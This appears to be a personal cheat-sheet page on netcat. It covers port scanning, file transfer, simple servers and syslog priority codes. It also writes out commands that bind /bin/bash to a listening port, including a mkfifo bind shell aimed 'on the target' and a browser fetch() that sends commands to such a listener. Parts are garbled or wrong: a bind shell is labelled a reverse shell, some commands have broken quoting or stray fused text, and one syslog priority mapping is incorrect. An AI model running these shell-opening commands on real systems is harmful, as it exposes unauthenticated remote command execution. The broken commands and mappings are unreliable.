Skip to content

netcat

Netcat is a utility that can be used to create connections between two (or more) machines using specified ports. One machine listens for a connection which essentially opens a specific port whilst the other attempts to connect to it. Without firewalls the process is straightforward and allows for a simple connection between the two machines. Firewalls on either machine make it a little more tricky and require a few more steps.

Install Netcat

emerge --ask net-analyzer/openbsd-netcat

Scan a single port

nc -v hostname 80

Scan mulitple ports

nc -v hostname 1-1000

Setup a simple text website

printf ‘HTTP/1.1 200 OK\n\n%s’ $(cat index.html) | netcat -l 1337

HTTP Requests with Netcat Commands

printf “GET / HTTP/1.0\r\n\r\n | nc google.com 80

Reverse Shell

  • A reverse shell is a remote access approach where you run administrative commands from one terminal while connecting to another server on the network. To get started, you need to enable the shell tool over a Netcat command by using Netcat reverse shell:

To get started, you need to enable the shell tool over a Netcat command by using Netcat reverse shell

nc -n -v -l -p 1337 -e /bin/bash
Then from any other system on the network you can connect to the reversed shell

Connect to the reversed shell

nc 127.0.0.1 1337
$ type any command and you are connected to the reversed shell if it worked

Bind Shell

Start a bind shell on the target

Below works as:

  • Listens on port 1337
  • Binds /bin/bash to the socket
  • Works on almost all systems
mkfifo /tmp/ncpipe
nc -lvnp 1337 < /tmp/ncpipe | /bin/bash > /tmp/ncpipe 2>&1

Now connect to our binded shell

nc nr1 1337

Chat or Web Server

Create a chat or web server

  • Server 
nc -lvvp 1337

Connect to our chat or web server

nc localhost 1337

Transfer files

Setup listening server (sender)

nc -lvp 1337 < text_file_to_be_sent.txt

Transfer text_file_to_be_sent.txt to our pc (receiver)

nc -w1 nr1 1337 > text_file_to_be_sent.txt

Send syslogs to a server

Value Severity Meaning
0 emerg System unusable
1 alert Immediate action required
2 crit Critical condition
3 err Error condition
4 warning Warning
5 notice Normal but significant
6 info Informational
7 debug Debug-level message
Facility Value Facility Name
0 kern
1 user
2 mail
3 daemon
4 auth
5 syslog
6 lpr
7 news
8 uucp
9 cron
10 authpriv
11 ftp
16 local0
17 local1
18 local2
19 local3
20 local4
21 local5
22 local6
23 local7
Value Description
<13> user.notice
<14> user.info
<15> user.debug
<11> user.err
<4> kern.warning
<132> local4.info (16×8+4)

How to Generate Specific Priority

echo '<164>test message' | nc -u -w1 192.168.1.1 514xample "Send a `local4.warning`"

Send UDP Test Message

nc -w0 -u 192.168.1.102 514 <<< "testing again from my home machine"
echo hi |nc -w0 -u 78.69.211.116 1337

Bind A Shell Via Javascript From Webrowser Console

  • Listener
nc -lvvp 1337 -e /bin/bash
  • Browser
fetch('http://192.168.1.64:1337', {
  method: 'POST',
  mode: 'no-cors',
  body: 'whoami'
});

Resource(s)